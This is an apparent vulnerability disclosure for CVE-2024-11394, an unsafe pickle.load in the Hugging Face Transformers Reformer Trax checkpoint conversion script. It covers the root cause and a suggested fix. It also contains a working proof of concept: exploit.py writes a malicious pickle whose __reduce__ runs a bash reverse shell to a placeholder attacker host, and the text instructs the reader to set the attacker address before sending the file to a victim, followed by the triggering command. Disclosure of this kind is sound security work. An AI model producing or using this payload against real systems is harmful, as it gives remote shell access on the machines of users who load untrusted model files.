# CVE-2024-11394

## Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability
  
**High-level overview and effects of the vulnerability:**  
The vulnerability allows an attacker to execute arbitrary code on the host machine by supplying a malicious `reformer trax` checkpoint file to the `convert_reformer_trax_checkpoint_to_pytorch.py` script in the Hugging Face Transformers repository.   
If an unsuspecting user uses a third-party `reformer trax` checkpoint file, executing the `convert_reformer_trax_checkpoint_to_pytorch.py` script will lead to remote code execution (RCE) on the victim's system.  
  

**The Vulnerable Product**  

-   Product: Hugging Face Transformers  
-   Module: Reformer  
-   File: transformers/src/transformers/models/reformer/convert_reformer_trax_checkpoint_to_pytorch.py 
-   Version: Latest 
- GitHub Permalink: [https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/reformer/convert_reformer_trax_checkpoint_to_pytorch.py](https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/reformer/convert_reformer_trax_checkpoint_to_pytorch.py)  
  

**Root Cause Analysis**  
  

-  **Detailed description of the vulnerability:** The vulnerability results from unsafe deserialization of untrusted data. The script uses `pickle.load` to load the checkpoint file and is vulnerable to code execution.  
  
-  **Code flow from input to the vulnerable condition:**  
 1. The user downloads a third-party `reformer trax` model.
 2. The user runs the `convert_reformer_trax_checkpoint_to_pytorch.py` script and passes the checkpoint file to it.  
 3. The `convert_reformer_trax_checkpoint_to_pytorch.py` script deserializes the checkpoint file and executes the malicious code.  
-  **Injection point:** The vulnerability occurs at the point where `pickle.load` is called.   
GitHub Permalink: [https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/reformer/convert_reformer_trax_checkpoint_to_pytorch.py#L192](https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/reformer/convert_reformer_trax_checkpoint_to_pytorch.py#L192)  
-  **Suggested fixes:** Replace `pickle.load` with `yaml.safe_load(yaml_file)` or `json.load` to prevent the execution of arbitrary code.   
  
-  **Instructions executing the proof-of-concept:**  

1.  Run `exploit.py` to create a malicious pickle file `malicious.pkl` that will create a reverse shell on the victim’s system:
```
# exploit.py

import pickle  
import os   
  
class Exploit:  
    def __reduce__(self):  
        return (os.system, ('bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1',))  
  
malicious_data = pickle.dumps(Exploit())  
with open('malicious.pkl', 'wb') as f:  
    f.write(malicious_data)  
  
print("Malicious pickle file created successfully.")
``` 
> Note: Change the ATTACKER_IP and ATTACKER_PORT before sending the file to the victim.
2. Create a `config.json` configuration file:
```
{  
    "attention_head_size": 64,  
    "attention_probs_dropout_prob": 0.1,  
    "attn_layers": [  
      "local",  
      "lsh",  
      "local",  
      "lsh",  
      "local",  
      "lsh"  
    ],  
    "axial_norm_std": 1.0,  
    "axial_pos_embds": true,  
    "axial_pos_embds_dim": [  
      64,  
      960  
    ],  
    "axial_pos_shape": [  
      64,  
      64  
    ],  
    "chunk_size_lm_head": 0,  
    "classifier_dropout": null,  
    "eos_token_id": 2,  
    "feed_forward_size": 512,  
    "hash_seed": null,  
    "hidden_act": "relu",  
    "hidden_dropout_prob": 0.1,  
    "hidden_size": 1024,  
    "initializer_range": 0.02,  
    "is_decoder": true,  
    "layer_norm_eps": 1e-12,  
    "local_attention_probs_dropout_prob": 0.05,  
    "local_attn_chunk_length": 64,  
    "local_num_chunks_after": 0,  
    "local_num_chunks_before": 1,  
    "lsh_attention_probs_dropout_prob": 0.0,  
    "lsh_attn_chunk_length": 64,  
    "lsh_num_chunks_after": 0,  
    "lsh_num_chunks_before": 1,  
    "max_position_embeddings": 4096,  
    "model_type": "reformer",  
    "num_attention_heads": 16,  
    "num_buckets": null,  
    "num_hashes": 1,  
    "num_hidden_layers": 6,  
    "pad_token_id": 0,  
    "tie_word_embeddings": false,  
    "transformers_version": "4.42.4",  
    "type_vocab_size": 2,  
    "use_cache": true,  
    "vocab_size": 30522  
  }
```
3. Run the `convert_reformer_trax_checkpoint_to_pytorch.py` script and pass the `malicious.pkl` file to `--trax_model_pkl_path`:  

```  
> python convert_reformer_trax_checkpoint_to_pytorch.py --trax_model_pkl_path malicious.pkl --config_file config.json --pytorch_dump_path .
```  

> Note: The `pytorch_dump_folder_path` can be set as any directory.  
  
**Software Download Link:**  
[https://github.com/huggingface/transformers/tree/main](https://github.com/huggingface/transformers/tree/main)  
  


